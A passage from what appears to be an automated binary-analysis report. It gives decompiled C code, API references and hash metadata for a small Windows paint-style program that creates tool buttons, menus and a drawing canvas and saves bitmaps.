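    elif precision == 2:
        cw &= 0xFFFFF3FF
    return cw & 0xFFFFFFFF
```

The APIs line under the listing records a RaiseException call whose first argument is C000000D; in this model that is the path where none of the five flag bits in _a12 was set, so the observed call raised STATUS_INVALID_PARAMETER rather than one of the floating-point codes.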

                                              C-Code - Quality: 100%
                                              			E002F60F1() {
                                              				signed int _t3;
                                              
                                              				_t3 = GetProcessHeap();
                                              				 *0x305908 = _t3;
                                              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                              			}

Instruction addresses (per-line address column of the report, collapsed here): 0x002f60f1, 0x002f60f9, 0x002f6101.

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
• Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
• Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
• Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: HeapProcess
                                              • String ID:
                                              • API String ID: 54951025-0
                                              • Opcode ID: 5d07fccdfd1def923123b09d5f5308fd8743d7f83c0d230ed7f47d08d3a6e264
                                              • Instruction ID: 0348ca4710eba9fbfdbde371d6d63423a3ca77eb5dbc190b7f0aa93cb1e7e6e0
                                              • Opcode Fuzzy Hash: 5d07fccdfd1def923123b09d5f5308fd8743d7f83c0d230ed7f47d08d3a6e264
                                              • Instruction Fuzzy Hash: 6FA01230202200CF97014F30694860A379856002E070540395404C0230DB2040809A00
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                              • Instruction ID: 8e0fcbd226df310d4391e153934a6cfec96e6121b82c397588fd4d0800eb0793
                                              • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                              • Instruction Fuzzy Hash: 9E11A336A00109EFEB14DBAED88496DF7FDEB89664B554065F809D3214F7709E41C660
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                              • Instruction ID: ac02ad6aa7d316b6712c0deb025884446614535027cdcceab9e81513c4ec143b
                                              • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                              • Instruction Fuzzy Hash: 02E09A397606099FCB48CBA8D880D25B3F8EB4C220B124390FC29C73A0EB34EE01DA50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                              • Instruction ID: 8fc2aa05d1b45a7d73e33fb05755c0c5934803dc7dd36bd7775d251f57bc3fae
                                              • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                              • Instruction Fuzzy Hash: 04E046367115608BC3299A19A480966F3E8EBCC2B171A496AF94AE3B16C330EC02C690
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659709171.0000000001130000.00000040.00000001.sdmp, Offset: 01130000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                              • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                              • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                              • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC670(struct HWND__* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                              				int _v8;
                                              				struct _WNDCLASSW _v48;
                                              				struct _WNDCLASSW _v88;
                                              
                                              				_v48.style = 0;
                                              				_v48.lpfnWndProc = 0;
                                              				_v48.cbClsExtra = 0;
                                              				_v48.cbWndExtra = 0;
                                              				_v48.hInstance = 0;
                                              				_v48.hIcon = 0;
                                              				_v48.hCursor = 0;
                                              				_v48.hbrBackground = 0;
                                              				_v48.lpszMenuName = 0;
                                              				_v48.lpszClassName = 0;
                                              				_v48.lpszClassName = L"Panel";
                                              				_v48.hbrBackground = GetStockObject(0);
                                              				_v48.lpfnWndProc = E002FCD70;
                                              				RegisterClassW( &_v48);
                                              				_v88.style = 0;
                                              				_v88.lpfnWndProc = 0;
                                              				_v88.cbClsExtra = 0;
                                              				_v88.cbWndExtra = 0;
                                              				_v88.hInstance = 0;
                                              				_v88.hIcon = 0;
                                              				_v88.hCursor = 0;
                                              				_v88.hbrBackground = 0;
                                              				_v88.lpszMenuName = 0;
                                              				_v88.lpszClassName = 0;
                                              				_v88.lpszClassName = L"Paper";
                                              				_v88.hbrBackground = GetStockObject(0);
                                              				_v88.lpfnWndProc = E002FCE30;
                                              				RegisterClassW( &_v88);
                                              				_v8 = 0xa;
				// 0x50000000 = WS_CHILD | WS_VISIBLE; the last-but-two argument is the control id (1..8)
				// Narrow "P"/"S"/... literals passed to the W API are the decompiler's rendering of the string pointers
				CreateWindowExW(0, L"Button", "P", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 1, 0, 0);
				_v8 = _v8 + 0x1e;
				CreateWindowExW(0, L"Button", "S", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 2, 0, 0);
				_v8 = _v8 + 0x1e;
				CreateWindowExW(0, L"Button", "L", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 3, 0, 0);
				_v8 = _v8 + 0x1e;
				CreateWindowExW(0, L"Button", "R", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 4, 0, 0);
				_v8 = _v8 + 0x1e;
				CreateWindowExW(0, L"Button", L"Ci", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 5, 0, 0);
				_v8 = _v8 + 0x1e;
				CreateWindowExW(0, L"Button", "F", 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 6, 0, 0);
				_v8 = _v8 + 0x1e;
				// handles of the two custom-class windows are returned through the out-pointers
				 *_a8 = CreateWindowExW(0, L"Panel", 0, 0x50000000, 0xa, _v8, 0x19, 0x19, _a4, 0, 0, 0);
				 *_a12 = CreateWindowExW(0, L"Paper", 0, 0x50000000, 0x32, 0xa, 0x1f4, 0x15e, _a4, 0, 0, 0);
				CreateWindowExW(0, L"Button", "<", 0x50000000, 0x32, 0x172, 0x19, 0x19, _a4, 7, 0, 0);
				return CreateWindowExW(0, L"Button", ">", 0x50000000, 0x50, 0x172, 0x19, 0x19, _a4, 8, 0, 0);
                                              			}

                                              Instruction addresses: 0x002fc676, 0x002fc67f, 0x002fc682, 0x002fc685, 0x002fc688, 0x002fc68b, 0x002fc68e, 0x002fc691, 0x002fc694, 0x002fc697, 0x002fc69a, 0x002fc6a9, 0x002fc6ac, 0x002fc6b7, 0x002fc6bd, 0x002fc6c6, 0x002fc6c9, 0x002fc6cc, 0x002fc6cf, 0x002fc6d2, 0x002fc6d5, 0x002fc6d8, 0x002fc6db, 0x002fc6de, 0x002fc6e1, 0x002fc6f0, 0x002fc6f3, 0x002fc6fe, 0x002fc704, 0x002fc730, 0x002fc73c, 0x002fc764, 0x002fc770, 0x002fc798, 0x002fc7a4, 0x002fc7cc, 0x002fc7d8, 0x002fc800, 0x002fc80c, 0x002fc834, 0x002fc840, 0x002fc86e, 0x002fc89f, 0x002fc8c7, 0x002fc8fc

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: CreateWindow$ClassObjectRegisterStock
                                              • String ID: Button$Button$Button$Button$Button$Button$Button$Button$Panel$Panel$Paper$Paper$`H0
                                              • API String ID: 3256756162-2676657579
                                              • Opcode ID: b244ee4955badfd3ea15da68f666ac0b3f861633c72cbfa5cbd3c625bfc10c3a
                                              • Instruction ID: 424faa7f9534653367afee9729ea1560f13470f27dd87e2b3161a5a5f9d683d7
                                              • Opcode Fuzzy Hash: b244ee4955badfd3ea15da68f666ac0b3f861633c72cbfa5cbd3c625bfc10c3a
                                              • Instruction Fuzzy Hash: F281ECB4B80348BFFB11CF95DC56FAE7AB1AB48B05F208119F704BA2D0D6F16A009B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD400(void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				struct HDC__* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				struct HBITMAP__* _v20;
                                              				void* _v24;
                                              				int _v28;
                                              				intOrPtr _v56;
                                              				intOrPtr _v68;
                                              				intOrPtr _v84;
                                              				char* _v88;
                                              				WCHAR* _v104;
                                              				struct HWND__* _v112;
                                              				struct tagOFNA _v116;
                                              				char _v634;
                                              				char _v636;
                                              				short _t43;
                                              				struct HWND__* _t71;
                                              
                                              				_t86 = __edi;
                                              				_t43 =  *0x30593c; // 0x0
                                              				_v636 = _t43;
                                              				E002F1D00(__edi,  &_v634, 0, 0x206);
                                              				_v28 = 0;
                                              				_v16 = _a8;
				if(_v16 == 1) { // WM_CREATE
					CreateWindowExW(0, L"button", 0x304ad8, 0x50000000, 5, 5, 0x4b, 0x19, _a4, 1, 0, 0); // WS_CHILD | WS_VISIBLE
				} else {
					if(_v16 == 0x10) { // WM_CLOSE
						DestroyWindow(_a4);
					} else {
						if(_v16 == 0x111) { // WM_COMMAND: snapshot the window at 0x3059b4 into a bitmap
							_t71 =  *0x3059b4; // 0x0
							_v8 = GetDC(_t71);
							_v12 = CreateCompatibleDC(_v8);
							_v20 = CreateCompatibleBitmap(_v8, 0x1f4, 0x15e);
							_v24 = SelectObject(_v12, _v20);
							BitBlt(_v12, 0, 0, 0x1f4, 0x15e, _v8, 0, 0, 0xcc0020); // 0xcc0020 = SRCCOPY
							SelectObject(_v12, _v24);
							DeleteObject(_v8); // DCs are passed to DeleteObject instead of ReleaseDC/DeleteDC; kept as decompiled
							DeleteObject(_v12);
							E002F1D00(_t86,  &_v116, 0, 0x58); // zero an OPENFILENAMEW (0x58 bytes)
							_v116 = 0x58; // lStructSize
							_v112 = _a4; // hwndOwner
							_v104 = L"Bmp File(*Bmp)"; // lpstrFilter
							_v88 =  &_v636; // lpstrFile
							_v84 = 0x104; // nMaxFile = MAX_PATH
							_v56 = 0x304b34;
							_v68 = 0x304b40;
							if(GetOpenFileNameW( &_v116) != 0) {
								E002FB350(_v20, _v88); // write the captured bitmap to the chosen path
							}
							DeleteObject(_v20);
						}
					}
				}
				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}
                                              Instruction addresses: 0x002fd400, 0x002fd409, 0x002fd40f, 0x002fd424, 0x002fd42c, 0x002fd436, 0x002fd43d, 0x002fd47a, 0x002fd43f, 0x002fd443, 0x002fd57e, 0x002fd449, 0x002fd450, 0x002fd485, 0x002fd492, 0x002fd49f, 0x002fd4b6, 0x002fd4c7, 0x002fd4e9, 0x002fd4f7, 0x002fd501, 0x002fd50b, 0x002fd519, 0x002fd521, 0x002fd52b, 0x002fd52e, 0x002fd53b, 0x002fd53e, 0x002fd545, 0x002fd54c, 0x002fd55f, 0x002fd569, 0x002fd569, 0x002fd572, 0x002fd572, 0x002fd450, 0x002fd443, 0x002fd59d

                                              APIs
                                              • CreateWindowExW.USER32 ref: 002FD47A
                                              • GetDC.USER32(00000000), ref: 002FD48C
                                              • CreateCompatibleDC.GDI32(?), ref: 002FD499
                                              • CreateCompatibleBitmap.GDI32(?,000001F4,0000015E), ref: 002FD4B0
                                              • SelectObject.GDI32(?,?), ref: 002FD4C1
                                              • BitBlt.GDI32(?,00000000,00000000,000001F4,0000015E,?,00000000,00000000,00CC0020), ref: 002FD4E9
                                              • SelectObject.GDI32(?,?), ref: 002FD4F7
                                              • DeleteObject.GDI32(?), ref: 002FD501
                                              • DeleteObject.GDI32(?), ref: 002FD50B
                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 002FD557
                                              • DeleteObject.GDI32(?), ref: 002FD572
                                              • DestroyWindow.USER32(?), ref: 002FD57E
                                              • DefWindowProcW.USER32(?,00000001,?,?), ref: 002FD594
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Object$CreateDeleteWindow$CompatibleSelect$BitmapDestroyFileNameOpenProc
                                              • String ID: Bmp File(*Bmp)$X$bmp$button
                                              • API String ID: 2517243105-3907938070
                                              • Opcode ID: 8e351130efeec61648f2ed0fbb18562ae1848318521fafc9f96196b05ed8b7a4
                                              • Instruction ID: c10537d6c6a7636b83f40705adc118003bd9f99f614a95a35bcade4454d79bf8
                                              • Opcode Fuzzy Hash: 8e351130efeec61648f2ed0fbb18562ae1848318521fafc9f96196b05ed8b7a4
                                              • Instruction Fuzzy Hash: C7410AB5A50208EBDB14DFA0DC59FBEB7B5AB48741F108528FB05AB290DBB59A00CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC900(struct HWND__* _a4) {
                                              				struct HMENU__* _v8;
                                              				struct HMENU__* _v12;
                                              				struct HMENU__* _v16;
                                              				struct HMENU__* _v20;
                                              
				_v16 = CreateMenu(); // menu bar
				_v20 = CreateMenu(); // first popup
				_v8 = CreateMenu(); // third popup
				_v12 = CreateMenu(); // second popup
				// AppendMenuW(hMenu, uFlags, uIDNewItem, lpNewItem); the 0x3047xx values are
				// pointers to item captions in the image's data section
				AppendMenuW(_v20, 0, 0xa, 0x304780);
				AppendMenuW(_v20, 0, 0xb, 0x30478c);
				AppendMenuW(_v8, 0, 0xc, 0x304798);
				AppendMenuW(_v8, 0, 0xd, 0x3047ac);
				AppendMenuW(_v8, 0, 0xe, 0x3047c0);
				AppendMenuW(_v8, 0x800, 0, 0); // 0x800 = MF_SEPARATOR
				AppendMenuW(_v8, 0, 1, 0x3047cc);
				AppendMenuW(_v8, 0, 1, 0x3047dc);
				AppendMenuW(_v12, 0, 3, 0x3047f0);
				AppendMenuW(_v12, 0, 1, 0x304808);
				AppendMenuW(_v12, 0, 0xf, 0x304818);
				AppendMenuW(_v16, 0x10, _v20, 0x30482c); // 0x10 = MF_POPUP: submenu handle passed as the item
				AppendMenuW(_v16, 0x10, _v12, 0x304838);
				AppendMenuW(_v16, 0x10, _v8, 0x304848);
				return SetMenu(_a4, _v16);
                                              			}
                                              Instruction addresses: 0x002fc90c, 0x002fc915, 0x002fc91e, 0x002fc927, 0x002fc937, 0x002fc94a, 0x002fc95d, 0x002fc970, 0x002fc983, 0x002fc996, 0x002fc9a9, 0x002fc9bc, 0x002fc9cf, 0x002fc9e2, 0x002fc9f5, 0x002fca0a, 0x002fca1f, 0x002fca34, 0x002fca4b

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Menu$Append$Create
                                              • String ID:
                                              • API String ID: 508680711-0
                                              • Opcode ID: d56284e506ee990aae235beb6f46758a1c52f0257b7e0cb193e9b9f86cd032c9
                                              • Instruction ID: 4e4399401736d2d8082761ab7defd37d6f88db0f9f50055c06793ba720eebf12
                                              • Opcode Fuzzy Hash: d56284e506ee990aae235beb6f46758a1c52f0257b7e0cb193e9b9f86cd032c9
                                              • Instruction Fuzzy Hash: A041F175A80304BBDB119BE1EC6EFBF7B35BB54B51F014958F319AA1E0C6B19A00CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD620(void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				int _v8;
                                              
                                              				_v8 = _a8;
				if(_v8 == 1) { // WM_CREATE: four size buttons, all with control id 1
					CreateWindowExW(0, L"button", L"32px", 0x50000000, 0x32, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0); // WS_CHILD | WS_VISIBLE
					CreateWindowExW(0, L"button", L"64px", 0x50000000, 0x55, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
					CreateWindowExW(0, L"button", L"128px", 0x50000000, 0x73, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
					CreateWindowExW(0, L"button", L"256px", 0x50000000, 0x96, 0x1e, 0x1e, 0x19, _a4, 1, 0, 0);
				} else {
					if(_v8 == 0x10) { // WM_CLOSE
						DestroyWindow(_a4);
					} else {
						if(_v8 == 0x111) { // WM_COMMAND: any button click closes the window
							DestroyWindow(_a4);
						}
					}
				}
				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}
                                              Instruction addresses: 0x002fd627, 0x002fd62e, 0x002fd66f, 0x002fd698, 0x002fd6c1, 0x002fd6ed, 0x002fd630, 0x002fd634, 0x002fd705, 0x002fd63a, 0x002fd641, 0x002fd6f9, 0x002fd6f9, 0x002fd641, 0x002fd634, 0x002fd724

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.659460648.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000000.00000002.659440154.00000000002F0000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659495128.00000000002FE000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659512177.0000000000304000.00000040.00020000.sdmp
                                              • Associated: 00000000.00000002.659527614.0000000000305000.00000004.00020000.sdmp
                                              • Associated: 00000000.00000002.659543920.0000000000306000.00000002.00020000.sdmp
                                              • Associated: 00000000.00000002.659581790.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: Window$Create$Destroy$Proc
                                              • String ID: 128px$256px$32px$64px$button$button$button$button
                                              • API String ID: 3952264185-740826005
                                              • Opcode ID: 216e3887d6d73487e7b5a9338cc8fd2210a8a55af58d492f38a60c0944ff06a4
                                              • Instruction ID: c6d594fe9e2ba9dd701f18af6f1a68252f1e5e04e61b8b6f80d1c4b09b4f4056
                                              • Opcode Fuzzy Hash: 216e3887d6d73487e7b5a9338cc8fd2210a8a55af58d492f38a60c0944ff06a4
                                              • Instruction Fuzzy Hash: 4721F9753D034CBBFB25DE50DD5AFEA7625AB08F41F104114FB096E1D1D2F1AA409754
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 94%
                                              			E002FCE30(struct HWND__* _a4, int _a8, int _a12, signed int _a16) {
                                              				struct HDC__* _v8;
                                              				int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				intOrPtr _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				struct tagPAINTSTRUCT _v96;
                                              				int _t89;
                                              				int _t91;
                                              				int _t98;
                                              				intOrPtr _t100;
                                              				long _t102;
                                              				int _t103;
                                              				int _t105;
                                              				long _t106;
                                              				int _t107;
                                              				intOrPtr _t120;
                                              				void* _t122;
                                              				int _t123;
                                              				long _t125;
                                              				int _t126;
                                              				int _t129;
                                              				int _t139;
                                              				int _t140;
                                              				void* _t141;
                                              				void* _t145;
                                              				int _t146;
                                              				int _t148;
                                              				int _t149;
                                              				int _t152;
                                              				int _t154;
                                              				int _t155;
                                              				int _t158;
                                              				intOrPtr _t160;
                                              				intOrPtr _t168;
                                              				int _t178;
                                              				int _t179;
                                              				long _t180;
                                              				int _t182;
                                              				int _t183;
                                              				long _t187;
                                              				int _t188;
                                              				int _t189;
                                              				int _t191;
                                              				intOrPtr _t192;
                                              				int _t198;
                                              				int _t199;
                                              				long _t200;
                                              				int _t201;
                                              				int _t202;
                                              				int _t203;
                                              				int _t207;
                                              				long _t212;
                                              				int _t213;
                                              				intOrPtr _t214;
                                              				int _t219;
                                              				int _t220;
                                              				long _t222;
                                              				int _t224;
                                              				int _t225;
                                              				long _t226;
                                              				intOrPtr _t228;
                                              				intOrPtr _t229;
                                              				int _t235;
                                              				intOrPtr _t237;
                                              				long _t240;
                                              				int _t241;
                                              				long _t247;
                                              				int _t248;
                                              				int _t249;
                                              				int _t251;
                                              				long _t253;
                                              				int _t254;
                                              				long _t255;
                                              				int _t256;
                                              				long _t257;
                                              				int _t258;
                                              				long _t259;
                                              				int _t260;
                                              				int _t262;
                                              
                                              				_v12 = _a8;
                                              				if(_v12 > 0x200) {
                                              					__eflags = _v12 - 0x201;
                                              					if(_v12 == 0x201) {
                                              						 *0x305990 = _a16 & 0xffff;
                                              						 *0x305988 = _a16 >> 0x00000010 & 0xffff;
                                              						_t219 =  *0x305990; // 0x0
                                              						 *0x305994 = _t219;
                                              						_t89 =  *0x305988; // 0x0
                                              						 *0x30598c = _t89;
                                              						 *0x305940 = 1;
                                              						_t174 = _a4;
                                              						_v8 = GetDC(_a4);
                                              						__eflags =  *0x304b3c - 2;
                                              						if( *0x304b3c == 2) {
                                              							_t220 =  *0x305988; // 0x0
                                              							_t91 =  *0x305990; // 0x0
                                              							 *0x304a00 = GetPixel(_v8, _t91, _t220);
                                              						} else {
                                              							_t229 =  *0x3059c0; // 0x12f0ef0
                                              							__eflags =  *((intOrPtr*)(_t229 + 8)) -  *0x3059c4; // 0x12f1028
                                              							if(__eflags != 0) {
                                              								_t174 =  *0x3059c0; // 0x12f0ef0
                                              								E002FB910(_t174);
                                              							}
                                              							E002FC2C0(_t174, 0x3059c4, 0x3059c0);
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							_t226 =  *0x304a00; // 0xffffff
                                              							_t105 =  *0x305988; // 0x0
                                              							_t182 =  *0x305990; // 0x0
                                              							_t106 = GetPixel(_v8, _t182, _t105);
                                              							_t107 =  *0x305988; // 0x0
                                              							_t183 =  *0x305990; // 0x0
                                              							_t228 =  *0x3059c0; // 0x12f0ef0
                                              							E002FC390(_t183, _t228, _t183, _t107, _t106, _t226);
                                              						}
                                              						__eflags =  *0x304b3c - 6;
                                              						if(__eflags != 0) {
                                              							__eflags =  *0x304b3c - 5;
                                              							if( *0x304b3c != 5) {
                                              								_t222 =  *0x304a00; // 0xffffff
                                              								_t98 =  *0x305988; // 0x0
                                              								_t178 =  *0x305990; // 0x0
                                              								SetPixel(_v8, _t178, _t98, _t222);
                                              							}
                                              						} else {
                                              							_t100 =  *0x3059c0; // 0x12f0ef0
                                              							_t179 =  *0x305988; // 0x0
                                              							_t224 =  *0x305990; // 0x0
                                              							_t102 = GetPixel(_v8, _t224, _t179);
                                              							_t180 =  *0x304a00; // 0xffffff
                                              							_t225 =  *0x305988; // 0x0
                                              							_t103 =  *0x305990; // 0x0
                                              							E002FB540(__eflags, _v8, _t103, _t225, _t180, _t102, 0, 0, 0, _t100);
                                              						}
                                              						ReleaseDC(_a4, _v8);
                                              						L55:
                                              						return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              					}
                                              					__eflags = _v12 - 0x202;
                                              					if(_v12 == 0x202) {
                                              						 *0x305940 = 0;
                                              						_v8 = GetDC(_a4);
                                              						__eflags =  *0x304b3c - 4;
                                              						if( *0x304b3c == 4) {
                                              							L39:
                                              							SelectObject(_v8, GetStockObject(5));
                                              							_v32 = _a16 & 0xffff;
                                              							_v28 = _a16 >> 0x00000010 & 0xffff;
                                              							__eflags =  *0x304b3c - 4;
                                              							if( *0x304b3c != 4) {
                                              								__eflags =  *0x304b3c - 3;
                                              								if( *0x304b3c != 3) {
                                              									__eflags =  *0x304b3c - 5;
                                              									if( *0x304b3c == 5) {
                                              										_push(1);
                                              										_t120 =  *0x3059c0; // 0x12f0ef0
                                              										_t187 =  *0x304a00; // 0xffffff
                                              										_t188 =  *0x305988; // 0x0
                                              										_t235 =  *0x305990; // 0x0
                                              										_t122 = E002FB900(_v32, _t235, _t188, _v32, _v28);
                                              										_t123 =  *0x305988; // 0x0
                                              										_t189 =  *0x305990; // 0x0
                                              										E002FB9D0(_v8, _t189, _t123, _t122, _t187, _t120, 1);
                                              									}
                                              								} else {
                                              									_t237 =  *0x3059c0; // 0x12f0ef0
                                              									_t125 =  *0x304a00; // 0xffffff
                                              									_t126 =  *0x305988; // 0x0
                                              									_t191 =  *0x305990; // 0x0
                                              									E002FBE50(_v8, _v8, _t191, _t126, _v32, _v28, _t125, _t237, 1, 1);
                                              								}
                                              							} else {
                                              								_t192 =  *0x3059c0; // 0x12f0ef0
                                              								_t240 =  *0x304a00; // 0xffffff
                                              								_t241 =  *0x305988; // 0x0
                                              								_t129 =  *0x305990; // 0x0
                                              								E002FBD50(_v8, _t129, _t241, _v32, _v28, _t240, _t192, 1, 1);
                                              							}
                                              							L45:
                                              							ReleaseDC(_a4, _v8);
                                              							goto L55;
                                              						}
                                              						__eflags =  *0x304b3c - 3;
                                              						if( *0x304b3c == 3) {
                                              							goto L39;
                                              						}
                                              						__eflags =  *0x304b3c - 5;
                                              						if( *0x304b3c != 5) {
                                              							goto L45;
                                              						}
                                              						goto L39;
                                              					} else {
                                              						goto L55;
                                              					}
                                              				}
                                              				if(_v12 == 0x200) {
                                              					__eflags =  *0x305940 - 1;
                                              					if( *0x305940 != 1) {
                                              						L35:
                                              						goto L55;
                                              					}
                                              					_v8 = GetDC(_a4);
                                              					_v16 = _a16 & 0xffff;
                                              					_v20 = _a16 >> 0x00000010 & 0xffff;
                                              					__eflags =  *0x304b3c - 1;
                                              					if( *0x304b3c != 1) {
                                              						L25:
                                              						__eflags =  *0x304b3c - 4;
                                              						if( *0x304b3c == 4) {
                                              							L28:
                                              							SetROP2(_v8, 6);
                                              							__eflags =  *0x304b3c - 4;
                                              							if( *0x304b3c != 4) {
                                              								__eflags =  *0x304b3c - 3;
                                              								if( *0x304b3c != 3) {
                                              									__eflags =  *0x304b3c - 5;
                                              									if( *0x304b3c == 5) {
                                              										_push(0);
                                              										_t247 =  *0x304a00; // 0xffffff
                                              										_t139 =  *0x30598c; // 0x0
                                              										_t198 =  *0x305994; // 0x0
                                              										_t248 =  *0x305988; // 0x0
                                              										_t140 =  *0x305990; // 0x0
                                              										_t141 = E002FB900(_t140, _t140, _t248, _t198, _t139);
                                              										_t199 =  *0x305988; // 0x0
                                              										_t249 =  *0x305990; // 0x0
                                              										E002FB9D0(_v8, _t249, _t199, _t141, _t247, 0, 0);
                                              										_push(0);
                                              										_t200 =  *0x304a00; // 0xffffff
                                              										_t201 =  *0x305988; // 0x0
                                              										_t251 =  *0x305990; // 0x0
                                              										_t145 = E002FB900(_v16, _t251, _t201, _v16, _v20);
                                              										_t146 =  *0x305988; // 0x0
                                              										_t202 =  *0x305990; // 0x0
                                              										E002FB9D0(_v8, _t202, _t146, _t145, _t200, 0, 0);
                                              									}
                                              								} else {
                                              									_t253 =  *0x304a00; // 0xffffff
                                              									_t148 =  *0x30598c; // 0x0
                                              									_t203 =  *0x305994; // 0x0
                                              									_t254 =  *0x305988; // 0x0
                                              									_t149 =  *0x305990; // 0x0
                                              									E002FBE50(_t254, _v8, _t149, _t254, _t203, _t148, _t253, 0, 0, 0);
                                              									_t255 =  *0x304a00; // 0xffffff
                                              									_t256 =  *0x305988; // 0x0
                                              									_t152 =  *0x305990; // 0x0
